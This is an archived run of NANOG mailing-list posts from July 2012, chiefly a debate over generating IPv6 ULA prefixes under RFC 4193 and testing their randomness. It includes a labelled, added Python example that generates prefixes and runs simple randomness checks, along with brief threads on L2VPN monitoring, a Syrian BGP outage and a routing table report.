improbable != impossible > -- > -JH > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From cb.list6 at gmail.com Thu Jul 19 09:40:31 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Thu, 19 Jul 2012 07:40:31 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: If i may summarize this thread as a method to conclude it. 1. Some people like GUA the most. 2. Smart network operators understand the facts and make decisions based on facts (ULA exist, and it meets a need in some scenarios. NAT and lack of addresses are not reasons to use ULA). 3. Most FUD around ULA comes from an over-reaction to ipv4 NAT sins, misunderstandings about how security policy works in the real world , and deficiencies in mathmatical education. CB On Jul 19, 2012 5:48 AM, "Mark Andrews" wrote: > > In message < > CAAAwwbXh1wS_9aX4FwGrqmSBJmKGJ0nWHRi9EN53HtL36VhSSg at mail.gmail.com> > , Jimmy Hess writes: > > On 7/18/12, Karl Auer wrote: > > > I don't understand the professed need for provable randomness. Without > a > > > number *space* to provide context, randomness is inherently > > > non-provable. The whole point of the randomness of those 40 bits of ULA > > > infix is that any number is as likely as any other number. Someone, > > > > When numbers are selected by choosing a random value; certain ratios > > of bits set to "1" are more likely to occur than other ratios of bits > > set to "1". 
> > > > A random generator that is operating correctly, is much more likely to > > emit a number with 50% of the bits set to 1, than it is to emit a > > number with 0% of the bits set to 1, given a sufficient number of > > bits. If the ratio is inconsistent by a sufficient margin, and your > > sample of the bits is large enough in number, you can show with high > > confidence that the number is not random; a 1 in 10 billion chance > > of the number being randomly generated, would be pretty convincing, > > for example. > > Actually you can't. > > fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. > fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. > > The ratio of the number of bits doesn't tell you anything about whether > the number was random or not. > > > Removing the temptation by excluding the small number of choices with > > 90% - 95% of the bits set to 1 may eliminate future problems caused > > by an early "accident"/"error" in assigning the initial ULA, > > compared to the minor inconvenience of needing to run the ULA > > generator one more time to get an actual usable range. > > > > > somewhere, is eventually going to get 10:0000:0000, someone else will > > > eventually get 20:0000:0000 and so on. And they are just as likely to > > > get them now as in ten years time. > > > > That is extremely improbable. > > If you generate a million ULA IDs a day, every day, it is expected to > > be over 1000 years before you generate one of those two. > > improbable != impossible > > > -- > > -JH > > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > > From valdis.kletnieks at vt.edu Thu Jul 19 10:21:45 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Thu, 19 Jul 2012 11:21:45 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Thu, 19 Jul 2012 07:40:31 -0700." 
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: <4612.1342711305@turing-police.cc.vt.edu> On Thu, 19 Jul 2012 07:40:31 -0700, Cameron Byrne said: > 3. Most FUD around ULA comes from an over-reaction to ipv4 NAT sins, > misunderstandings about how security policy works in the real world , and > deficiencies in mathmatical education. I'll add on that said security policies are *themselves* often based on misunderstandings. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From jason.iannone at gmail.com Thu Jul 19 11:35:39 2012 From: jason.iannone at gmail.com (Jason Iannone) Date: Thu, 19 Jul 2012 10:35:39 -0600 Subject: MPLS L2VPN monitoring In-Reply-To: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> References: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> Message-ID: We also use UNI NIDs that trap interface status, log interface and COS queue statistics, and respond to y.1731 traffic. On Tue, Jul 17, 2012 at 7:56 AM, Siegel, David wrote: > We deploy NIDs to the customer premise. You just can't get enough alarm data be looking only at your router/switch on your side of an Ethernet NNI to give you a proper indication of whether the service is functional, and it also happens to be quite handy to have when a performance test/verification is required. > > There are a variety of vendors out there to choose from...we have quite a lot of Tellabs and Accedian out in the field. 
> > I had hoped that last mile vendors would have been providing NIDs "smartjack" style by now in a fairly ubiquitous fashion, but alas none of them have stepped up to the plate so we're still putting them out there on our own dime. > > Dave > > -----Original Message----- > From: Peter Ehiwe [mailto:peterehiwe at gmail.com] > Sent: Tuesday, July 17, 2012 4:14 AM > To: North American Network Operators' Group > Subject: MPLS L2VPN monitoring > > Hello , > > For those who provide l2vpn services to customers over MPLS , what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor > > I have tools in place to monitor these circuits but i want to know based on group members experiences in order to improve my monitoring platform for this circuits. > > Thanks a lot! > > From stephen at sprunk.org Thu Jul 19 12:19:38 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Thu, 19 Jul 2012 12:19:38 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718180735.GA11403@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> Message-ID: <500841AA.4020209@sprunk.org> On 18-Jul-12 13:07, Saku Ytti wrote: > On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: >> Those were not considered requirements for the algorithm in RFC 4193 since there is no scenario /where RFC 4193 addresses are a valid solution in the first place/ for which testability or provability of the algorithm's results are important or even useful. > If collision occurs, if dispute occurs, provability that one party did not use BCP method can be useful to solve dispute and decide who renumbers. In my experience, pointing at RFCs is rarely how disputes are resolved in the real world. 
> Other potential problem with RFC, if you have software to generate two, if software runs parallel, it may generate same prefixes.

It is incredibly unlikely, and that is all RFC 4193 claims to offer: /statistically/ unique addresses. If you want /provably/ unique addresses, use GUAs--or lobby for ULA-C, which to date has been soundly rejected for lack of usefulness.

> IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some cheapskates were assigning themselves 'free' OUIs from end of the space, confident it'll never collide. So duplicate OUIs can happen. Also some NIC vendors ship with non-unique MAC.

You'd still need two systems with duplicate MACs to run the algorithm at exactly the same timestamp, which IIRC has a resolution of 2^-32 seconds.

> What makes RFC method good?

RFC 4193 doesn't mandate any particular algorithm; it just provides an example that was designed to be easily implemented and used. You can use another RNG if you wish.

S

-- 
Stephen Sprunk         "God does not play dice."  --Albert Einstein
CCIE #3723         "God is an inveterate gambler, and He throws the
K5SSS        dice at every possible opportunity." --Stephen Hawking

-------------- next part --------------
A non-text attachment was scrubbed...
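Added example for the two generation methods and the "can you tell from one value?" exchange above; this is my own code, not anything posted in the thread, shipped by ISC, or taken from RFC 4193 (the RFC describes its algorithm only in prose). It implements the RFC 4193 section 3.2.2 sample algorithm (SHA-1 over the 64-bit NTP time and the EUI-64, keep the low 40 bits) beside the plain 40-bit CSPRNG draw Mark Andrews used with dd and od, then applies two lenient single-value checks of the kind Jimmy Hess floated: bit balance and the run count. The modified-EUI-64 construction from a MAC follows RFC 4291; the function names, the suspicion thresholds and the sample MAC 00:11:22:33:44:55 are my own choices and the MAC is constructed, not a real host's. The checks flag fdaa:aaaa:aaaa (forty runs of length one) but pass fdf0:f0f0:f0f0, which is Mark's point in a nutshell: a test on one value is a sanity check, never proof. Karl's "if it looks non-random, run it again" is the practical rule.

```python
"""
ULA /48 generation two ways plus lenient single-value sanity checks.
Added example; not code from the NANOG thread, ISC or RFC 4193.
"""
import hashlib
import secrets
import time
from typing import Dict, List

# Seconds between the NTP epoch (1900-01-01) and the Unix epoch (1970-01-01).
NTP_UNIX_OFFSET = 2208988800


def ntp_timestamp_now() -> int:
    """Current time as a 64-bit NTP timestamp (32-bit seconds, 32-bit fraction)."""
    now = time.time()
    whole = int(now)
    seconds = (whole + NTP_UNIX_OFFSET) & 0xFFFFFFFF
    fraction = int((now - whole) * (1 << 32)) & 0xFFFFFFFF
    return (seconds << 32) | fraction


def eui64_from_mac(mac: bytes) -> bytes:
    """Modified EUI-64 from a 48-bit MAC (RFC 4291: insert ff:fe, flip the
    universal/local bit), which RFC 4193 allows when no EUI-64 exists."""
    if len(mac) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return bytes([mac[0] ^ 0x02]) + mac[1:3] + b"\xff\xfe" + mac[3:6]


def rfc4193_global_id(ntp_time: int, eui64: bytes) -> bytes:
    """RFC 4193 3.2.2: SHA-1 over (64-bit NTP time || EUI-64); the Global ID
    is the least significant 40 bits of the 160-bit digest."""
    if len(eui64) != 8:
        raise ValueError("EUI-64 must be 8 bytes")
    key = ntp_time.to_bytes(8, "big") + eui64
    return hashlib.sha1(key).digest()[-5:]


def random_global_id() -> bytes:
    """The alternative from the thread: 40 bits straight from the OS CSPRNG
    (what `dd bs=5 count=1 if=/dev/random` does in shell)."""
    return secrets.token_bytes(5)


def ula_prefix(global_id: bytes) -> str:
    """fc00::/7 with L=1 (i.e. fd00::/8) followed by the 40-bit Global ID."""
    if len(global_id) != 5:
        raise ValueError("Global ID must be 40 bits")
    h = global_id.hex()
    return f"fd{h[0:2]}:{h[2:6]}:{h[6:10]}::/48"


def global_id_from_prefix(prefix: str) -> bytes:
    """Inverse of ula_prefix(); accepts 'fdxx:xxxx:xxxx' or 'fdxx:xxxx:xxxx::/48'."""
    groups = prefix.split("::")[0].split(":")
    h = "".join(g.zfill(4) for g in groups[:3]).lower()
    if len(h) != 12 or not h.startswith("fd"):
        raise ValueError("not an fd00::/8 ULA prefix")
    return bytes.fromhex(h[2:])


def bits(global_id: bytes) -> List[int]:
    """The 40 bits of a Global ID, most significant first."""
    return [(b >> i) & 1 for b in global_id for i in range(7, -1, -1)]


def ones_count(global_id: bytes) -> int:
    """How many of the 40 bits are set; ~Binomial(40, 1/2) for a fair source."""
    return sum(bits(global_id))


def run_count(global_id: bytes) -> int:
    """Number of maximal runs of identical bits (the Wald-Wolfowitz runs
    statistic); 40 fair coin flips give a mean of 20.5 runs, sd about 3.1."""
    b = bits(global_id)
    return 1 + sum(1 for i in range(1, len(b)) if b[i] != b[i - 1])


def looks_non_random(global_id: bytes) -> Dict[str, bool]:
    """Lenient checks on a single 40-bit value. The bands are my choice and
    sit about four standard deviations out, so a CSPRNG trips them very
    rarely; passing them proves nothing, as the thread points out."""
    n1 = ones_count(global_id)
    r = run_count(global_id)
    return {
        "balance_suspicious": n1 <= 8 or n1 >= 32,
        "runs_suspicious": r <= 8 or r >= 33,
    }


if __name__ == "__main__":
    # Constructed sample MAC, not any real host's.
    eui = eui64_from_mac(bytes.fromhex("001122334455"))
    print("RFC 4193 :", ula_prefix(rfc4193_global_id(ntp_timestamp_now(), eui)))
    print("CSPRNG   :", ula_prefix(random_global_id()))
    for p in ("fdaa:aaaa:aaaa", "fdf0:f0f0:f0f0", "fd00:0000:0000"):
        print(p, looks_non_random(global_id_from_prefix(p)))
```

Note that two hosts with the same MAC only collide under the RFC 4193 path if they also hash the identical 64-bit NTP timestamp, which is the point made in the message above; the CSPRNG path has no such dependency but also nothing to show a third party afterwards.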
From stephen at sprunk.org Thu Jul 19 12:30:02 2012
From: stephen at sprunk.org (Stephen Sprunk)
Date: Thu, 19 Jul 2012 12:30:02 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <1342670272.6281.646.camel@karl>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl>
Message-ID: <5008441A.8050207@sprunk.org>

On 18-Jul-12 22:57, Karl Auer wrote:
> I don't understand the professed need for provable randomness.

I think his concern is that if an SP generates a ULA prefix for a customer, and that prefix happens to collide with someone else's ULA prefix, the SP may wish to prove that it was a true collision rather than a result of the SP's laziness or incompetence.

However, that concern does /not/ apply to those interested in ULAs in general. For the very limited community it does apply to, use a provable RNG instead of the one in RFC 4193.

S

-- 
Stephen Sprunk         "God does not play dice."  --Albert Einstein
CCIE #3723         "God is an inveterate gambler, and He throws the
K5SSS        dice at every possible opportunity." --Stephen Hawking
From stephen at sprunk.org Thu Jul 19 12:47:52 2012
From: stephen at sprunk.org (Stephen Sprunk)
Date: Thu, 19 Jul 2012 12:47:52 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org>
Message-ID: <50084848.4080001@sprunk.org>

On 19-Jul-12 07:47, Mark Andrews wrote:
> In message , Jimmy Hess writes:
>> When numbers are selected by choosing a random value; certain ratios of bits set to "1" are more likely to occur than other ratios of bits set to "1".
>>
>> A random generator that is operating correctly, is much more likely to emit a number with 50% of the bits set to 1, than it is to emit a number with 0% of the bits set to 1, given a sufficient number of bits. If the ratio is inconsistent by a sufficient margin, and your sample of the bits is large enough in number, you can show with high confidence that the number is not random; a 1 in 10 billion chance of the number being randomly generated, would be pretty convincing, for example.
> Actually you can't.
>
> fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random.
> fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random.
>
> The ratio of the number of bits doesn't tell you anything about whether
> the number was random or not.

He oversimplified the real entropy test, which covers those cases. For a sufficiently long stream of random bits, there should be twice as many runs of length 1 as runs of length 2, twice as many runs of length 2 as runs of length 3, etc. And for each length, they should be evenly divided between runs of 0s and runs of 1s.

Of course, 40 bits is nowhere near "sufficiently long", but you can score the entropy and set a lower bound for acceptability. The two examples above would get very low entropy scores, far below any sensible lower bound.

>> That is extremely improbable. If you generate a million ULA IDs a day, every day, it is expected to be over 1000 years before you generate one of those two.
> improbable != impossible

All RFC 4193 ever claimed to offer was improbability. If that's not good enough, get a GUA from your RIR.

S

-- 
Stephen Sprunk         "God does not play dice."  --Albert Einstein
CCIE #3723         "God is an inveterate gambler, and He throws the
K5SSS        dice at every possible opportunity." --Stephen Hawking

From valdis.kletnieks at vt.edu Thu Jul 19 13:29:14 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Thu, 19 Jul 2012 14:29:14 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: Your message of "Wed, 18 Jul 2012 21:07:35 +0300." <20120718180735.GA11403@pob.ytti.fi>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi>
Message-ID: <18509.1342722554@turing-police.cc.vt.edu>

On Wed, 18 Jul 2012 21:07:35 +0300, Saku Ytti said:
> If collision occurs, if dispute occurs, provability that one party did not
> use BCP method can be useful to solve dispute and decide who renumbers.

Looking at actual numbers out of RFC4193:

   The following table shows the probability of a collision for a range
   of connections using a 40-bit Global ID field.
       Connections      Probability of Collision

             2          1.81*10^-12
            10          4.54*10^-11
           100          4.54*10^-09
          1000          4.54*10^-07
         10000          4.54*10^-05

OK? So even if you merge and re-merge, and go on a massive buying spree and
accumulate a network where you have to interoperate 1,000 ULAs, you're *still*
looking at a literally million-to-one shot. And if you only have a mess of 100
ULAs, it's a billion-to-one.

Now, compare that to the chances that you'll acquire 2 companies, both of whom
had an employee who didn't actually generate a proper random number, but did
this sort of thing instead:

http://www.spinics.net/lists/linux-driver-devel/msg26431.html

A lot of people are worrying about the wrong problem.

From dmburgess at linktechs.net Thu Jul 19 13:43:11 2012
From: dmburgess at linktechs.net (Dennis Burgess)
Date: Thu, 19 Jul 2012 13:43:11 -0500
Subject: Telus Wholesale NOC Number
Message-ID: <50710E9A7E64454C974049FC998EB6555C6D5D@03-exchange.lti.local>

Anyone got a number to Telus Wholesale? Got an issue with a PPPoE over L2TP setup.

Dennis Burgess, Mikrotik Certified Trainer
Author of "Learn RouterOS - Second Edition"
Link Technologies, Inc -- Mikrotik & WISP Support Services
Office: 314-735-0270  Website: http://www.linktechs.net - Skype: linktechs
-- Create Wireless Coverage's with www.towercoverage.com - 900Mhz - LTE - 3G - 3.65 - TV Whitespace
5-Day Advanced RouterOS Workshop -- July 23rd 2012 - St. Louis, MO, USA
5-Day Advanced RouterOS Workshop - Oct 8th 2012 - St. Louis, MO, USA

From saku at ytti.fi Thu Jul 19 14:11:02 2012
From: saku at ytti.fi (Saku Ytti)
Date: Thu, 19 Jul 2012 22:11:02 +0300
Subject: using "reserved" IPv6 space
In-Reply-To: <18509.1342722554@turing-police.cc.vt.edu>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <18509.1342722554@turing-police.cc.vt.edu>
Message-ID: <20120719191102.GA13703@pob.ytti.fi>

On (2012-07-19 14:29 -0400), valdis.kletnieks at vt.edu wrote:

> OK? So even if you merge and re-merge, and go on a massive buying spree and
> accumulate a network where you have to interoperate 1,000 ULAs, you're *still*
> looking at a literally million-to-one shot. And if you only have a mess of 100 ULAs,

My point was, earlier in this thread 40b random method was suggested, which
was deemed non RFC compliant. And I've viewed it superior to strictly RFC.
But on later post, another author pointed out that 40b random is in
conformance to the RFC.
To me 40b random is simpler to implement and does not have either of the
risks I described (however unlikely, why should I make implementation in
given domain more complex and less strong).

-- 
  ++ytti

From mysidia at gmail.com Thu Jul 19 19:30:25 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Thu, 19 Jul 2012 19:30:25 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org>
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org>
Message-ID:

On 7/19/12, Mark Andrews wrote:
> Actually you can't.
> fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random.
> fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random.
[snip]
> The ratio of the number of bits doesn't tell you anything about whether
> the number was random or not.
[snip]

Sure it does. A ratio of 1s to 0s of a sufficient deviation is a
sufficient but not a necessary condition for establishing that a
sequence of binary numbers shown almost certainly was not chosen
randomly.

As for whether "fdf0:f0f0:f0f0" is a random number or not, I cannot say,
not without a valid test for randomness on the sequence of bits that were
chosen, and there are multiple appropriate tests available; use any
reasonable test you like, they do exist, and 40 random bits is an amply
large sample size.

Despite that, it is also definitely possible to manually construct strings
that are not produced randomly, which nevertheless by design pass any
specific test for randomness; intentional 'malice' cannot really be
eliminated.

However, there _are_ many non-random strings that exist which a 'lazy' or
broken ULA ID generator might pick, that can be very easily detected as
non-random with sufficient confidence, to tell the user "Hey, sorry, you
can't use that. Please generate a new ULA ID".

> improbable != impossible

Improbable with a sufficiently small probability is equal to impossible for
all intents and purposes. The probability of generating any specific
decimal number you pick a priori, constructed out of 40 bits, is
essentially zero, no matter what number you pick; there are _a very large
number_ of possible ULA IDs you can exclude, before you have excluded
enough that it actually matters.

Rejecting ULA IDs on equipment that have less than a 10^-11 chance of being
a random sequence of bits is less likely to reject a valid ID than there is
to be a collision on a ULA ID, and it would have a high probability of
preventing future collisions caused by accident, misconfiguration, etc.
Which means that it may be a large improvement on the "honor system" for
picking ULA IDs with no verification.

"The collision doesn't happen" is a better scenario than "I know who to
blame.... the guy before me who just picked zero.. and some former employee
in the other company that just picked a ULA ID of zero."
-- 
-JH

From kauer at biplane.com.au Thu Jul 19 20:07:17 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Fri, 20 Jul 2012 11:07:17 +1000
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org>
Message-ID: <1342746437.3052.49.camel@karl>

On Thu, 2012-07-19 at 19:30 -0500, Jimmy Hess wrote:
> > The ratio of the number of bits doesn't tell you anything about
> > whether the number was random or not.
>
> Sure it does. A ratio of 1s to 0s of a sufficient deviation, is a
> sufficient but not a necessarily condition, for establishing that a
> sequence of binary numbers shown almost certainly was not chosen
> randomly.

A *sequence*, yes. A single number in isolation, no. Whether the bits
within a single value are distributed randomly or not is irrelevant.

You seem to be confusing the randomness of a sequence of bits (i.e.,
within a particular prefix) with the randomness of a sequence of
prefixes. You have the entire bit sequence of a particular prefix
available to inspect, so you can make a call on the randomness of the
bits, but you do NOT have the entire prefix sequence, so CANNOT make a
call on the randomness of the prefix.

You can say, for a sufficient number of bits, whether the bits are
distributed randomly. Agreed. But given a specific bit, without knowing
the other bits, you cannot tell whether that specific bit was chosen
randomly.

If my prefix generating algorithm is to choose 39 bits completely
randomly but always set bit 7, you cannot tell that bit 7 has been set
non-randomly by inspecting only one prefix, because in a certain number
of genuinely random prefixes, bit 7 will be set anyway. Maybe the one
you happen to be looking at is such a one. The same is true of any two
bits, and any three bits - and so on, all the way out to 40 bits.

> However, there _are_ many non-random strings that exist which a
> 'lazy' or broken ULA ID generator might pick, that can be very easily
> detected as non-random with sufficient confidence, to tell the user
> "Hey, sorry, you can't use that. Please generate a new ULA ID".

You can pick them against human criteria; you can't pick them against
mathematical criteria unless you have the sequence as well as the value.
All zeros is exactly as likely as insert-any-prefix-here.

But: IANAS (I Am Not A Statistician :-) so I think I'll stop now. I am
either flogging a dead horse or digging an embarrassing hole for
myself :-)

Regards, K.

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)                   http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687

From tvhawaii at shaka.com Thu Jul 19 22:10:53 2012
From: tvhawaii at shaka.com (Michael Painter)
Date: Thu, 19 Jul 2012 17:10:53 -1000
Subject: Victory for Open WiFi
Message-ID: <07F53F31A844480B89EF0B2B94FAA615@owner59e1f1502>

From the Electronic Frontier Foundation.
https://www.eff.org/deeplinks/2012/07/judge-copyright-troll-cant-bully-internet-subscriber-bogus-legal-theory

From gbonser at seven.com Fri Jul 20 00:00:48 2012
From: gbonser at seven.com (George Bonser)
Date: Fri, 20 Jul 2012 05:00:48 +0000
Subject: Hearing Syria internet cut
Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com>

Can anyone confirm?

From gbonser at seven.com Fri Jul 20 00:42:29 2012
From: gbonser at seven.com (George Bonser)
Date: Fri, 20 Jul 2012 05:42:29 +0000
Subject: Hearing Syria internet cut
In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com>
Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E8908A@RWC-MBX1.corp.seven.com>

I'm likely seeing some fallout from the earlier brief outage.

> -----Original Message-----
> From: George Bonser [mailto:gbonser at seven.com]
> Sent: Thursday, July 19, 2012 10:01 PM
> To: nanog at nanog.org
> Subject: Hearing Syria internet cut
>
> Can anyone confirm?
>

From andree+nanog at toonk.nl Fri Jul 20 01:21:21 2012
From: andree+nanog at toonk.nl (Andree Toonk)
Date: Thu, 19 Jul 2012 23:21:21 -0700
Subject: Hearing Syria internet cut
In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com>
Message-ID: <5008F8E1.1070304@toonk.nl>

.-- My secret spy satellite informs me that at 12-07-19 10:00 PM George Bonser wrote:

> Can anyone confirm?

Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP
tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19).
Cheers,
 Andree

From cscora at apnic.net Fri Jul 20 14:10:41 2012
From: cscora at apnic.net (Routing Analysis Role Account)
Date: Sat, 21 Jul 2012 05:10:41 +1000 (EST)
Subject: Weekly Routing Table Report
Message-ID: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net>

This is an automated weekly mailing describing the state of the Internet
Routing Table as seen from APNIC's router in Japan.

The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG,
TRNOG, CaribNOG and the RIPE Routing Working Group.

Daily listings are sent to bgp-stats at lists.apnic.net

For historical data, please see http://thyme.rand.apnic.net.

If you have any comments please contact Philip Smith .

Routing Table Report   04:00 +10GMT Sat 21 Jul, 2012

Report Website:     http://thyme.rand.apnic.net
Detailed Analysis:  http://thyme.rand.apnic.net/current/

Analysis Summary
----------------

BGP routing table entries examined:                              418048
    Prefixes after maximum aggregation:                          176224
    Deaggregation factor:                                          2.37
    Unique aggregates announced to Internet:                     203512
Total ASes present in the Internet Routing Table:                 41560
    Prefixes per ASN:                                             10.06
Origin-only ASes present in the Internet Routing Table:           33342
Origin ASes announcing only one prefix:                           15690
Transit ASes present in the Internet Routing Table:                5589
Transit-only ASes present in the Internet Routing Table:            132
Average AS path length visible in the Internet Routing Table:       4.5
Max AS path length visible:                                          26
Max AS path prepend of ASN ( 36992)                                  22
Prefixes from unregistered ASNs in the Routing Table:               368
Unregistered ASNs in the Routing Table:                             134
Number of 32-bit ASNs allocated by the RIRs:                       3013
Number of 32-bit ASNs visible in the Routing Table:                2629
Prefixes from 32-bit ASNs in the Routing Table:                    6809
Special use prefixes present in the Routing Table:                    1
Prefixes being announced from unallocated address space:            168
Number of addresses announced to Internet:                   2568092204
    Equivalent to 153 /8s, 17 /16s and 250 /24s
Percentage of available address space announced:                   69.3
Percentage of allocated address space announced:                   69.4
Percentage of available address space allocated:                   99.9
Percentage of address space in use by end-sites:                   93.0
Total number of prefixes smaller than registry allocations:      145304

APNIC Region Analysis Summary
-----------------------------

Prefixes being announced by APNIC Region ASes:                   102118
    Total APNIC prefixes after maximum aggregation:               32802
    APNIC Deaggregation factor:                                    3.11
Prefixes being announced from the APNIC address blocks:          102579
    Unique aggregates announced from the APNIC address blocks:    42176
APNIC Region origin ASes present in the Internet Routing Table:    4719
    APNIC Prefixes per ASN:                                       21.74
APNIC Region origin ASes announcing only one prefix:               1246
APNIC Region transit ASes present in the Internet Routing Table:    745
Average APNIC Region AS path length visible:                        4.6
Max APNIC Region AS path length visible:                             26
Number of APNIC region 32-bit ASNs visible in the Routing Table:    250
Number of APNIC addresses announced to Internet:              704482432
    Equivalent to 41 /8s, 253 /16s and 140 /24s
Percentage of available APNIC address space announced:             82.3

ARIN Region Analysis Summary
----------------------------

Prefixes being announced by ARIN Region ASes:                    152850
    Total ARIN prefixes after maximum aggregation:                77506
    ARIN Deaggregation factor:                                     1.97
Prefixes being announced from the ARIN address blocks:           153890
    Unique aggregates announced from the ARIN address blocks:     68642
ARIN Region origin ASes present in the Internet Routing Table:    15199
    ARIN Prefixes per ASN:                                        10.13
ARIN Region origin ASes announcing only one prefix:                5763
ARIN Region transit ASes present in the Internet Routing Table:    1606
Average ARIN Region AS path length visible:                         4.1
Max ARIN Region AS path length visible:                              24
Number of ARIN region 32-bit ASNs visible in the Routing Table:      16
Number of ARIN addresses announced to Internet:              1071726976
    Equivalent to 63 /8s, 225 /16s and 65 /24s
